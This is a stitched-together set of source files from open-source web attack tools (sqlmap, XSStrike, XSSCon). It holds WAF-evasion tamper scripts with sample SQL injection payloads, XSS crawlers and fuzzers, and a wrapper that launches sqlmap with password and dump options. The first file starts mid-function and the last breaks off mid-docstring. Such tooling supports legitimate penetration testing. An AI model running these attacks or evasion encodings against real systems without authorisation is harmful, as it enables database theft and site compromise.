                                                self.csi,
                                                str(self.color_map["white"] + 30),
                                                "m",
                                                string,
                                                self._reset(message),
                                            )
                                        ),
                                        1,
                                    )
                                else:
                                    match = re.search(
                                        r" \('(.+)'\)\Z", message
                                    ) or re.search(r"output: '(.+)'\Z", message)
                                    if match:
                                        string = match.group(1)
                                        message = message.replace(
                                            "'%s'" % string,
                                            "'%s'"
                                            % "".join(
                                                (
                                                    self.csi,
                                                    str(self.color_map["white"] + 30),
                                                    "m",
                                                    string,
                                                    self._reset(message),
                                                )
                                            ),
                                            1,
                                        )
                                    else:
                                        for match in re.finditer(
                                            r"[^\w]'([^']+)'", message
                                        ):  # single-quoted
                                            string = match.group(1)
                                            message = message.replace(
                                                "'%s'" % string,
                                                "'%s'"
                                                % "".join(
                                                    (
                                                        self.csi,
                                                        str(
                                                            self.color_map["white"] + 30
                                                        ),
                                                        "m",
                                                        string,
                                                        self._reset(message),
                                                    )
                                                ),
                                                1,
                                            )
                    else:
                        message = "".join(
                            (self.csi, ";".join(params), "m", message, self.reset)
                        )

                    if prefix:
                        message = "%s%s" % (prefix, message)

                    message = message.replace(
                        "%s]" % self.bold, "]%s" % self.bold
                    )  # dirty patch

            return message

    disableColor = False

    for argument in sys.argv:
        if "disable-col" in argument:
            disableColor = True
            break

    if disableColor:
        LOGGER_HANDLER = logging.StreamHandler(sys.stdout)
    else:
        LOGGER_HANDLER = _ColorizingStreamHandler(sys.stdout)
        LOGGER_HANDLER.level_map[logging.getLevelName("PAYLOAD")] = (
            None,
            "cyan",
            False,
        )
        LOGGER_HANDLER.level_map[logging.getLevelName("TRAFFIC OUT")] = (
            None,
            "magenta",
            False,
        )
        LOGGER_HANDLER.level_map[logging.getLevelName("TRAFFIC IN")] = (
            "magenta",
            None,
            False,
        )
except ImportError:
    LOGGER_HANDLER = logging.StreamHandler(sys.stdout)

FORMATTER = logging.Formatter("\r[%(asctime)s] [%(levelname)s] %(message)s", "%H:%M:%S")

LOGGER_HANDLER.setFormatter(FORMATTER)
LOGGER.addHandler(LOGGER_HANDLER)
LOGGER.setLevel(logging.INFO)



import re
import random


__PRIORITY__ = 2


def tamper(script):
    retval = []
    filler = ("%09", "%0a", "%0d", "+", "&#34;&#62;", "&#160;")
    searcher = re.compile("=")
    for c in script:
        if searcher.search(c) is not None:
            c = "={}".format(random.choice(filler))
        retval.append(c)
    return "".join(retval)



#!/usr/bin/env python
"""Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/) See the file
'LICENSE' for copying permission."""

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW


def dependencies():
    pass


def tamper(payload, **kwargs):
    """HTML encode in decimal (using code points) all characters (e.g. ' ->
    &#39;)

    >>> tamper("1' AND SLEEP(5)#")
    '&#49;&#39;&#32;&#65;&#78;&#68;&#32;&#83;&#76;&#69;&#69;&#80;&#40;&#53;&#41;&#35;'
    """

    retVal = payload

    if payload:
        retVal = ""
        i = 0

        while i < len(payload):
            retVal += "&#%s;" % ord(payload[i])
            i += 1

    return retVal



import requests
from ..helper.Log import *
from ..helper.helper import *
from ..core import *
from bs4 import BeautifulSoup
from urllib.parse import urljoin
from multiprocessing import Process


class crawler:
    visited = []

    @classmethod
    def getLinks(self, base, proxy, headers, cookie):
        lst = []

        conn = session(proxy, headers, cookie)
        text = conn.get(base).text
        isi = BeautifulSoup(text, "html.parser")

        for obj in isi.find_all("a", href=True):
            url = obj["href"]

            if url.startswith("http://") or url.startswith("https://"):
                continue

            elif url.startswith("mailto:") or url.startswith("javascript:"):
                continue

            elif urljoin(base, url) in self.visited:
                continue

            else:
                lst.append(urljoin(base, url))
                self.visited.append(urljoin(base, url))

        return lst

    @classmethod
    def crawl(self, base, depth, proxy, headers, level, method, cookie):
        urls = self.getLinks(base, proxy, headers, cookie)

        for url in urls:
            p = Process(
                target=core.main, args=(url, proxy, headers, level, cookie, method)
            )
            p.start()
            p.join()
            if depth != 0:
                self.crawl(url, depth - 1, base, proxy, level, method, cookie)

            else:
                break



import logging
import subprocess
import os


class SQLInjectionAttack:
    def sqlmap_attack(
        self,
        target_url,
        level=None,
        risk=None,
        password=False,
        dbs=True,
        tables=False,
        database=None,
        dump=False,
        TBL=None,
        cookies=None,
        crawl=False,
        batch=False,
    ):
        logging.info("Attacking %s with SQLMap...", target_url)
        path_to_executable = os.path.join(
            os.path.dirname(__file__), "SQL/sqlmap/sqlmap.py"
        )
        command = [
            "python3",
            path_to_executable,
            # "--flush-session",
            "-u",
            target_url,
            "--batch" if batch else "",
            "--level" if level else "",
            str(level) if level else "",
            "--risk" if risk else "",
            str(risk) if risk else "",
            "--passwords" if password else "",
            "--dbs" if dbs else "",
            "--tables" if tables else "",
            "-D" if database else "",
            database if database else "",
            "--dump" if dump else "",
            "-T" if TBL else "",
            TBL if TBL else "",
            "--cookie" if cookies else "",
            str(cookies) if cookies else "",
            "--crawl=2" if crawl else "",
        ]
        print("sqlmap")
        subprocess.run(command)

    def dsss_attack(
        self, target_url, data=None, cookie=None, ua=None, referer=None, proxy=None
    ):
        """Scans the target_url for potential SQL injection vulnerabilities.

        Args:
        - target_url (str): The target URL to scan.
        - data (str, optional): POST data to send with the request.
        - cookie (str, optional): HTTP Cookie header value.
        - ua (str, optional): HTTP User-Agent header value.
        - referer (str, optional): HTTP Referer header value.
        - proxy (str, optional): HTTP proxy address.

        Returns:
        - bool: True if potential vulnerabilities are found, False otherwise.
        """

        # Initialize options for the scanner
     #   attack = dsss(proxy=proxy, cookie=cookie, ua=ua, referer=referer)

        # Scan the target URL
        #result = attack.scan_page(target_url, data)

        command = [
            "python3",
            os.path.join(os.path.dirname(__file__), "SQL/dsss.py"),
            "-u",
            target_url,
            "--cookie" if cookie else "",
            cookie if cookie else "",
            "--user-agent" if ua else "",
            ua if ua else "",
            "--referer" if referer else "",
            referer if referer else "",
            "--proxy" if proxy else "",
            proxy if proxy else ""
        ]
        subprocess.run(command)

        # Print the result
#        logging.info(
 #           "\nscan results: %s vulnerabilities found"
  #          % ("possible" if result else "no")
    #    )
   #     print("sqli")
     #   return result



import string
import random


__PRIORITY__ = 10


def tamper(script):
    acceptable_characters = string.hexdigits
    retval = []
    for c in script:
        do_it = random.randint(0, len(script)) in range(len(retval) - 2, len(retval))
        if do_it:
            if c in acceptable_characters:
                c = "%%u%.4X" % random.randrange(0x10000)
        retval.append(c)
    return "".join(retval)



import copy
from urllib.parse import urlparse

from core.colors import green, end
from core.config import xsschecker
from core.fuzzer import fuzzer
from core.requester import requester
from core.utils import getUrl, getParams
from core.wafDetector import wafDetector
from core.log import setup_logger

logger = setup_logger(__name__)


def singleFuzz(target, paramData, encoding, headers, delay, timeout):
    GET, POST = (False, True) if paramData else (True, False)
    # If the user hasn't supplied the root url with http(s), we will handle it
    if not target.startswith("http"):
        try:
            response = requester("https://" + target, {}, headers, GET, delay, timeout)
            target = "https://" + target
        except:
            target = "http://" + target
    logger.debug("Single Fuzz target: {}".format(target))
    host = urlparse(target).netloc  # Extracts host out of the url
    logger.debug("Single fuzz host: {}".format(host))
    url = getUrl(target, GET)
    logger.debug("Single fuzz url: {}".format(url))
    params = getParams(target, paramData, GET)
    logger.debug_json("Single fuzz params:", params)
    if not params:
        logger.error("No parameters to test.")
        quit()
    WAF = wafDetector(
        url, {list(params.keys())[0]: xsschecker}, headers, GET, delay, timeout
    )
    if WAF:
        logger.error("WAF detected: %s%s%s" % (green, WAF, end))
    else:
        logger.good("WAF Status: %sOffline%s" % (green, end))

    for paramName in params.keys():
        logger.info("Fuzzing parameter: %s" % paramName)
        paramsCopy = copy.deepcopy(params)
        paramsCopy[paramName] = xsschecker
        fuzzer(url, paramsCopy, headers, GET, delay, timeout, WAF, encoding)



#!/usr/bin/env python
"""Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/) See the file
'LICENSE' for copying permission."""

from lib.core.enums import DBMS
from lib.core.settings import ACCESS_SYSTEM_DBS
from lib.core.unescaper import unescaper
from plugins.dbms.access.enumeration import Enumeration
from plugins.dbms.access.filesystem import Filesystem
from plugins.dbms.access.fingerprint import Fingerprint
from plugins.dbms.access.syntax import Syntax
from plugins.dbms.access.takeover import Takeover
from plugins.generic.misc import Miscellaneous


class AccessMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
    """This class defines Microsoft Access methods."""

    def __init__(self):
        self.excludeDbsList = ACCESS_SYSTEM_DBS

        for cls in self.__class__.__bases__:
            cls.__init__(self)

    unescaper[DBMS.ACCESS] = Syntax.escape



#
# Copyright (C) 2010-2012 Vinay Sajip. All rights reserved. Licensed under the new BSD license.
# (Note: 2018 modifications by @stamparm)
#

import logging
import re

from lib.core.settings import IS_WIN

if IS_WIN:
    import ctypes
    import ctypes.wintypes

    # Reference: https://gist.github.com/vsajip/758430
    #            https://github.com/ipython/ipython/issues/4252
    #            https://msdn.microsoft.com/en-us/library/windows/desktop/ms686047%28v=vs.85%29.aspx
    ctypes.windll.kernel32.SetConsoleTextAttribute.argtypes = [
        ctypes.wintypes.HANDLE,
        ctypes.wintypes.WORD,
    ]
    ctypes.windll.kernel32.SetConsoleTextAttribute.restype = ctypes.wintypes.BOOL


def stdoutEncode(data):  # Cross-referenced function
    return data


class ColorizingStreamHandler(logging.StreamHandler):
    # color names to indices
    color_map = {
        "black": 0,
        "red": 1,
        "green": 2,
        "yellow": 3,
        "blue": 4,
        "magenta": 5,
        "cyan": 6,
        "white": 7,
    }

    # levels to (background, foreground, bold/intense)
    level_map = {
        logging.DEBUG: (None, "blue", False),
        logging.INFO: (None, "green", False),
        logging.WARNING: (None, "yellow", False),
        logging.ERROR: (None, "red", False),
        logging.CRITICAL: ("red", "white", False),
    }
    csi = "\x1b["
    reset = "\x1b[0m"
    bold = "\x1b[1m"
    disable_coloring = False

    @property
    def is_tty(self):
        isatty = getattr(self.stream, "isatty", None)
        return isatty and isatty() and not self.disable_coloring

    def emit(self, record):
        try:
            message = stdoutEncode(self.format(record))
            stream = self.stream

            if not self.is_tty:
                if message and message[0] == "\r":
                    message = message[1:]
                stream.write(message)
            else:
                self.output_colorized(message)
            stream.write(getattr(self, "terminator", "\n"))

            self.flush()
        except (KeyboardInterrupt, SystemExit):
            raise
        except IOError:
            pass
        except:
            self.handleError(record)

    if not IS_WIN:

        def output_colorized(self, message):
            self.stream.write(message)

    else:
        ansi_esc = re.compile(r"\x1b\[((?:\d+)(?:;(?:\d+))*)m")

        nt_color_map = {
            0: 0x00,  # black
            1: 0x04,  # red
            2: 0x02,  # green
            3: 0x06,  # yellow
            4: 0x01,  # blue
            5: 0x05,  # magenta
            6: 0x03,  # cyan
            7: 0x07,  # white
        }

        def output_colorized(self, message):
            parts = self.ansi_esc.split(message)
            h = None
            fd = getattr(self.stream, "fileno", None)

            if fd is not None:
                fd = fd()

                if fd in (1, 2):  # stdout or stderr
                    h = ctypes.windll.kernel32.GetStdHandle(-10 - fd)

            while parts:
                text = parts.pop(0)

                if text:
                    self.stream.write(text)
                    self.stream.flush()

                if parts:
                    params = parts.pop(0)

                    if h is not None:
                        params = [int(p) for p in params.split(";")]
                        color = 0

                        for p in params:
                            if 40 <= p <= 47:
                                color |= self.nt_color_map[p - 40] << 4
                            elif 30 <= p <= 37:
                                color |= self.nt_color_map[p - 30]
                            elif p == 1:
                                color |= 0x08  # foreground intensity on
                            elif p == 0:  # reset to default color
                                color = 0x07
                            else:
                                pass  # error condition ignored

                        ctypes.windll.kernel32.SetConsoleTextAttribute(h, color)

    def _reset(self, message):
        if not message.endswith(self.reset):
            reset = self.reset
        elif self.bold in message:  # bold
            reset = self.reset + self.bold
        else:
            reset = self.reset

        return reset

    def colorize(self, message, levelno):
        if levelno in self.level_map and self.is_tty:
            bg, fg, bold = self.level_map[levelno]
            params = []

            if bg in self.color_map:
                params.append(str(self.color_map[bg] + 40))

            if fg in self.color_map:
                params.append(str(self.color_map[fg] + 30))

            if bold:
                params.append("1")

            if params and message:
                if message.lstrip() != message:
                    prefix = re.search(r"\s+", message).group(0)
                    message = message[len(prefix) :]
                else:
                    prefix = ""

                message = "%s%s" % (
                    prefix,
                    "".join((self.csi, ";".join(params), "m", message, self.reset)),
                )

        return message

    def format(self, record):
        message = logging.StreamHandler.format(self, record)
        return self.colorize(message, record.levelno)



import logging
from .colors import *

__all__ = ["setup_logger", "console_log_level", "file_log_level", "log_file"]

console_log_level = "INFO"
file_log_level = None
log_file = "xsstrike.log"
"""Default Logging Levels CRITICAL = 50 ERROR = 40 WARNING = 30 INFO = 20 DEBUG
= 10."""

VULN_LEVEL_NUM = 60
RUN_LEVEL_NUM = 22
GOOD_LEVEL_NUM = 25


logging.addLevelName(VULN_LEVEL_NUM, "VULN")
logging.addLevelName(RUN_LEVEL_NUM, "RUN")
logging.addLevelName(GOOD_LEVEL_NUM, "GOOD")


def _vuln(self, msg, *args, **kwargs):
    if self.isEnabledFor(VULN_LEVEL_NUM):
        self._log(VULN_LEVEL_NUM, msg, args, **kwargs)


def _run(self, msg, *args, **kwargs):
    if self.isEnabledFor(RUN_LEVEL_NUM):
        self._log(RUN_LEVEL_NUM, msg, args, **kwargs)


def _good(self, msg, *args, **kwargs):
    if self.isEnabledFor(GOOD_LEVEL_NUM):
        self._log(GOOD_LEVEL_NUM, msg, args, **kwargs)


logging.Logger.vuln = _vuln
logging.Logger.run = _run
logging.Logger.good = _good


log_config = {
    "DEBUG": {
        "value": logging.DEBUG,
        "prefix": "{}[*]{}".format(yellow, end),
    },
    "INFO": {
        "value": logging.INFO,
        "prefix": info,
    },
    "RUN": {
        "value": RUN_LEVEL_NUM,
        "prefix": run,
    },
    "GOOD": {
        "value": GOOD_LEVEL_NUM,
        "prefix": good,
    },
    "WARNING": {
        "value": logging.WARNING,
        "prefix": "[!!]".format(yellow, end),
    },
    "ERROR": {
        "value": logging.ERROR,
        "prefix": bad,
    },
    "CRITICAL": {
        "value": logging.CRITICAL,
        "prefix": "{}[--]{}".format(red, end),
    },
    "VULN": {
        "value": VULN_LEVEL_NUM,
        "prefix": "{}[++]{}".format(green, red),
    },
}


class CustomFormatter(logging.Formatter):
    def format(self, record):
        msg = super().format(record)
        if record.levelname in log_config.keys():
            msg = "%s %s %s" % (log_config[record.levelname]["prefix"], msg, end)
        return msg


class CustomStreamHandler(logging.StreamHandler):
    default_terminator = "\n"

    def emit(self, record):
        """Overrides emit method to temporally update terminator character in
        case last log record character is '\r' :param record:

        :return:
        """
        if record.msg.endswith("\r"):
            self.terminator = "\r"
            super().emit(record)
            self.terminator = self.default_terminator
        else:
            super().emit(record)


def _switch_to_no_format_loggers(self):
    self.removeHandler(self.console_handler)
    self.addHandler(self.no_format_console_handler)
    if hasattr(self, "file_handler") and hasattr(self, "no_format_file_handler"):
        self.removeHandler(self.file_handler)
        self.addHandler(self.no_format_file_handler)


def _switch_to_default_loggers(self):
    self.removeHandler(self.no_format_console_handler)
    self.addHandler(self.console_handler)
    if hasattr(self, "file_handler") and hasattr(self, "no_format_file_handler"):
        self.removeHandler(self.no_format_file_handler)
        self.addHandler(self.file_handler)


def _get_level_and_log(self, msg, level):
    if level.upper() in log_config.keys():
        log_method = getattr(self, level.lower())
        log_method(msg)
    else:
        self.info(msg)


def log_red_line(self, amount=60, level="INFO"):
    _switch_to_no_format_loggers(self)
    _get_level_and_log(self, red + ("-" * amount) + end, level)
    _switch_to_default_loggers(self)


def log_no_format(self, msg="", level="INFO"):
    _switch_to_no_format_loggers(self)
    _get_level_and_log(self, msg, level)
    _switch_to_default_loggers(self)


def log_debug_json(self, msg="", data={}):
    if self.isEnabledFor(logging.DEBUG):
        if isinstance(data, dict):
            import json

            try:
                self.debug("{} {}".format(msg, json.dumps(data, indent=2)))
            except TypeError:
                self.debug("{} {}".format(msg, data))
        else:
            self.debug("{} {}".format(msg, data))


def setup_logger(name="xsstrike"):
    from types import MethodType

    logger = logging.getLogger(name)
    logger.setLevel(logging.DEBUG)
    console_handler = CustomStreamHandler(sys.stdout)
    console_handler.setLevel(log_config[console_log_level]["value"])
    console_handler.setFormatter(CustomFormatter("%(message)s"))
    logger.addHandler(console_handler)
    # Setup blank handler to temporally use to log without format
    no_format_console_handler = CustomStreamHandler(sys.stdout)
    no_format_console_handler.setLevel((log_config[console_log_level]["value"]))
    no_format_console_handler.setFormatter(logging.Formatter(fmt=""))
    # Store current handlers
    logger.console_handler = console_handler
    logger.no_format_console_handler = no_format_console_handler

    if file_log_level:
        detailed_formatter = logging.Formatter(
            "%(asctime)s %(name)s - %(levelname)s - %(message)s"
        )
        file_handler = logging.FileHandler(log_file)
        file_handler.setLevel(log_config[file_log_level]["value"])
        file_handler.setFormatter(detailed_formatter)
        logger.addHandler(file_handler)
        # Setup blank handler to temporally use to log without format
        no_format_file_handler = logging.FileHandler(log_file)
        no_format_file_handler.setLevel(log_config[file_log_level]["value"])
        no_format_file_handler.setFormatter(logging.Formatter(fmt=""))
        # Store file handlers
        logger.file_handler = file_handler
        logger.no_format_file_handler = no_format_file_handler

    # Create logger method to only log a red line
    logger.red_line = MethodType(log_red_line, logger)
    # Create logger method to log without format
    logger.no_format = MethodType(log_no_format, logger)
    # Create logger method to convert data to json and log with debug level
    logger.debug_json = MethodType(log_debug_json, logger)
    return logger



from core.checker import checker


def filterChecker(url, params, headers, GET, delay, occurences, timeout, encoding):
    positions = occurences.keys()
    sortedEfficiencies = {}
    # adding < > to environments anyway because they can be used in all contexts
    environments = set(["<", ">"])
    for i in range(len(positions)):
        sortedEfficiencies[i] = {}
    for i in occurences:
        occurences[i]["score"] = {}
        context = occurences[i]["context"]
        if context == "comment":
            environments.add("-->")
        elif context == "script":
            environments.add(occurences[i]["details"]["quote"])
            environments.add("</scRipT/>")
        elif context == "attribute":
            if occurences[i]["details"]["type"] == "value":
                if (
                    occurences[i]["details"]["name"] == "srcdoc"
                ):  # srcdoc attribute accepts html data with html entity encoding
                    environments.add("&lt;")  # so let's add the html entity
                    environments.add("&gt;")  # encoded versions of < and >
            if occurences[i]["details"]["quote"]:
                environments.add(occurences[i]["details"]["quote"])
    for environment in environments:
        if environment:
            efficiencies = checker(
                url,
                params,
                headers,
                GET,
                delay,
                environment,
                positions,
                timeout,
                encoding,
            )
            efficiencies.extend([0] * (len(occurences) - len(efficiencies)))
            for occurence, efficiency in zip(occurences, efficiencies):
                occurences[occurence]["score"][environment] = efficiency
    return occurences



#!/usr/bin/env python
"""Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/) See the file
'LICENSE' for copying permission."""

import os
import re

from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMS
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.HIGH


def dependencies():
    singleTimeWarnMessage(
        "tamper script '%s' is only meant to be run against %s"
        % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)
    )


def tamper(payload, **kwargs):
    """Replaces (MySQL) instances like 'LIMIT M, N' with 'LIMIT N OFFSET M'
    counterpart.

    Requirement:
        * MySQL

    Tested against:
        * MySQL 5.0 and 5.5

    >>> tamper('LIMIT 2, 3')
    'LIMIT 3 OFFSET 2'
    """

    retVal = payload

    match = re.search(r"(?i)LIMIT\s*(\d+),\s*(\d+)", payload or "")
    if match:
        retVal = retVal.replace(
            match.group(0), "LIMIT %s OFFSET %s" % (match.group(2), match.group(1))
        )

    return retVal



#!/usr/bin/env python
"""Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/) See the file
'LICENSE' for copying permission."""

from lib.core.data import logger
from plugins.generic.enumeration import Enumeration as GenericEnumeration


class Enumeration(GenericEnumeration):
    def getPasswordHashes(self):
        warnMsg = "on Virtuoso it is not possible to enumerate the user password hashes"
        logger.warning(warnMsg)

        return {}

    def getPrivileges(self, *args, **kwargs):
        warnMsg = "on Virtuoso it is not possible to enumerate the user privileges"
        logger.warning(warnMsg)

        return {}

    def getRoles(self, *args, **kwargs):
        warnMsg = "on Virtuoso it is not possible to enumerate the user roles"
        logger.warning(warnMsg)

        return {}

    def searchDb(self):
        warnMsg = "on Virtuoso it is not possible to search databases"
        logger.warning(warnMsg)

        return []

    def searchTable(self):
        warnMsg = "on Virtuoso it is not possible to search tables"
        logger.warning(warnMsg)

        return []

    def searchColumn(self):
        warnMsg = "on Virtuoso it is not possible to search columns"
        logger.warning(warnMsg)

        return []

    def search(self):
        warnMsg = "on Virtuoso search option is not available"
        logger.warning(warnMsg)

    def getStatements(self):
        warnMsg = "on Virtuoso it is not possible to enumerate the SQL statements"
        logger.warning(warnMsg)

        return []



#!/usr/bin/env python
"""Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/) See the file
'LICENSE' for copying permission."""

from lib.core.convert import encodeBase64
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW


def dependencies():
    pass


def tamper(payload, **kwargs):
    """Base64-encodes all characters in a given payload.

    >>> tamper("1' AND SLEEP(5)#")
    'MScgQU5EIFNMRUVQKDUpIw=='
    """

    return encodeBase64(payload, binary=False) if payload else payload



#!/usr/bin/env python
"""Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/) See the file
'LICENSE' for copying permission."""

from plugins.generic.connector import Connector as GenericConnector


class Connector(GenericConnector):
    pass



#!/usr/bin/env python
"""Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/) See the file
'LICENSE' for copying permission."""

import random
import re

from lib.core.data import kb
from lib.core.datatype import OrderedSet
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL


def dependencies():
    pass


def tamper(payload, **kwargs):
    """Adds multiple spaces (' ') around SQL keywords.

    Notes:
        * Useful to bypass very weak and bespoke web application firewalls
          that has poorly written permissive regular expressions

    Reference: https://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt

    >>> random.seed(0)
    >>> tamper('1 UNION SELECT foobar')
    '1     UNION     SELECT     foobar'
    """

    retVal = payload

    if payload:
        words = OrderedSet()

        for match in re.finditer(r"\b[A-Za-z_]+\b", payload):
            word = match.group()

            if word.upper() in kb.keywords:
                words.add(word)

        for word in words:
            retVal = re.sub(
                r"(?<=\W)%s(?=[^A-Za-z_(]|\Z)" % word,
                "%s%s%s"
                % (" " * random.randint(1, 4), word, " " * random.randint(1, 4)),
                retVal,
            )
            retVal = re.sub(
                r"(?<=\W)%s(?=[(])" % word,
                "%s%s" % (" " * random.randint(1, 4), word),
                retVal,
            )

    return retVal



import re
import concurrent.futures
from urllib.parse import urlparse

from core.dom import dom
from core.log import setup_logger
from core.utils import getUrl, getParams
from core.requester import requester
from core.zetanize import zetanize
from plugins.retireJs import retireJs

logger = setup_logger(__name__)


def photon(seedUrl, headers, level, threadCount, delay, timeout, skipDOM):
    forms = []  # web forms
    processed = set()  # urls that have been crawled
    storage = set()  # urls that belong to the target i.e. in-scope
    schema = urlparse(seedUrl).scheme  # extract the scheme e.g. http or https
    host = urlparse(seedUrl).netloc  # extract the host e.g. example.com
    main_url = schema + "://" + host  # join scheme and host to make the root url
    storage.add(seedUrl)  # add the url to storage
    checkedDOMs = []

    def rec(target):
        processed.add(target)
        printableTarget = "/".join(target.split("/")[3:])
        if len(printableTarget) > 40:
            printableTarget = printableTarget[-40:]
        else:
            printableTarget = printableTarget + (" " * (40 - len(printableTarget)))
        logger.run("Parsing %s\r" % printableTarget)
        url = getUrl(target, True)
        params = getParams(target, "", True)
        if "=" in target:  # if there's a = in the url, there should be GET parameters
            inps = []
            for name, value in params.items():
                inps.append({"name": name, "value": value})
            forms.append({0: {"action": url, "method": "get", "inputs": inps}})
        response = requester(url, params, headers, True, delay, timeout).text
        retireJs(url, response)
        if not skipDOM:
            highlighted = dom(response)
            clean_highlighted = "".join(
                [re.sub(r"^\d+\s+", "", line) for line in highlighted]
            )
            if highlighted and clean_highlighted not in checkedDOMs:
                checkedDOMs.append(clean_highlighted)
                logger.good("Potentially vulnerable objects found at %s" % url)
                logger.red_line(level="good")
                for line in highlighted:
                    logger.no_format(line, level="good")
                logger.red_line(level="good")
        forms.append(zetanize(response))
        matches = re.findall(r'<[aA].*href=["\']{0,1}(.*?)["\']', response)
        for link in matches:  # iterate over the matches
            # remove everything after a "#" to deal with in-page anchors
            link = link.split("#")[0]
            if link.endswith(
                (".pdf", ".png", ".jpg", ".jpeg", ".xls", ".xml", ".docx", ".doc")
            ):
                pass
            else:
                if link[:4] == "http":
                    if link.startswith(main_url):
                        storage.add(link)
                elif link[:2] == "//":
                    if link.split("/")[2].startswith(host):
                        storage.add(schema + link)
                elif link[:1] == "/":
                    storage.add(main_url + link)
                else:
                    storage.add(main_url + "/" + link)

    try:
        for x in range(level):
            urls = (
                storage - processed
            )  # urls to crawl = all urls - urls that have been crawled
            # for url in urls:
            #     rec(url)
            threadpool = concurrent.futures.ThreadPoolExecutor(max_workers=threadCount)
            futures = (threadpool.submit(rec, url) for url in urls)
            for i in concurrent.futures.as_completed(futures):
                pass
    except KeyboardInterrupt:
        return [forms, processed]
    return [forms, processed]



"""
XSSCon - 2019/2020
This project was created by menkrep1337 with 407Aex team.
Copyright under the MIT license
"""

from .helper import G, N, R, Y
from datetime import datetime


class Log:
    @classmethod
    def info(self, text):
        print(
            "["
            + Y
            + datetime.now().strftime("%H:%M:%S")
            + N
            + "] ["
            + G
            + "INFO"
            + N
            + "] "
            + text
        )

    @classmethod
    def warning(self, text):
        print(
            "["
            + Y
            + datetime.now().strftime("%H:%M:%S")
            + N
            + "] ["
            + Y
            + "WARNING"
            + N
            + "] "
            + text
        )

    @classmethod
    def high(self, text):
        print(
            "["
            + Y
            + datetime.now().strftime("%H:%M:%S")
            + N
            + "] ["
            + R
            + "CRITICAL"
            + N
            + "] "
            + text
        )



import base64 as b64
import re


def base64(string):
    if re.match(r"^[A-Za-z0-9+\/=]+$", string) and (len(string) % 4) == 0:
        return b64.b64decode(string.encode("utf-8")).decode("utf-8")
    else:
        return b64.b64encode(string.encode("utf-8")).decode("utf-8")



import os
import tempfile

from core.config import defaultEditor
from core.colors import white, yellow
from core.log import setup_logger

logger = setup_logger(__name__)


def prompt(default=None):
    # try assigning default editor, if fails, use default
    editor = os.environ.get("EDITOR", defaultEditor)
    # create a temporary file and open it
    with tempfile.NamedTemporaryFile(mode="r+") as tmpfile:
        if default:  # if prompt should have some predefined text
            tmpfile.write(default)
            tmpfile.flush()
        child_pid = os.fork()
        is_child = child_pid == 0
        if is_child:
            # opens the file in the editor
            try:
                os.execvp(editor, [editor, tmpfile.name])
            except FileNotFoundError:
                logger.error(
                    "You don't have either a default $EDITOR value defined nor 'nano'"
                    " text editor"
                )
                logger.info(
                    "Execute %s`export EDITOR=/pat/to/your/editor` %sthen run XSStrike"
                    " again.\n\n" % (yellow, white)
                )
                exit(1)
        else:
            os.waitpid(child_pid, 0)  # wait till the editor gets closed
            tmpfile.seek(0)
            return tmpfile.read().strip()  # read the file



#!/usr/bin/env python
"""Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/) See the file
'LICENSE' for copying permission."""

from lib.core.data import logger
from plugins.generic.enumeration import Enumeration as GenericEnumeration


class Enumeration(GenericEnumeration):
    def getDbs(self):
        warnMsg = (
            "on Firebird it is not possible to enumerate databases (use only"
            " '--tables')"
        )
        logger.warning(warnMsg)

        return []

    def getPasswordHashes(self):
        warnMsg = "on Firebird it is not possible to enumerate the user password hashes"
        logger.warning(warnMsg)

        return {}

    def searchDb(self):
        warnMsg = "on Firebird it is not possible to search databases"
        logger.warning(warnMsg)

        return []

    def getHostname(self):
        warnMsg = "on Firebird it is not possible to enumerate the hostname"
        logger.warning(warnMsg)

    def getStatements(self):
        warnMsg = "on Firebird it is not possible to enumerate the SQL statements"
        logger.warning(warnMsg)

        return []



#!/usr/bin/env python

# Copyright (c) 2010, Chris Hall <chris.hall@mod10.net>
# All rights reserved.

# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:

# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.

# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.



#!/usr/bin/env python
"""Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/) See the file
'LICENSE' for copying permission."""

from lib.core.data import kb
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.HIGHEST


def dependencies():
    pass


def tamper(payload, **kwargs):
    """Replaces instances like 'SLEEP(5)' with (e.g.) "GET_LOCK('ETgP',5)".

    Requirement:
        * MySQL

    Tested against:
        * MySQL 5.0 and 5.5

    Notes:
        * Useful to bypass very weak and bespoke web application firewalls
          that filter the SLEEP() and BENCHMARK() functions

        * Reference: https://zhuanlan.zhihu.com/p/35245598

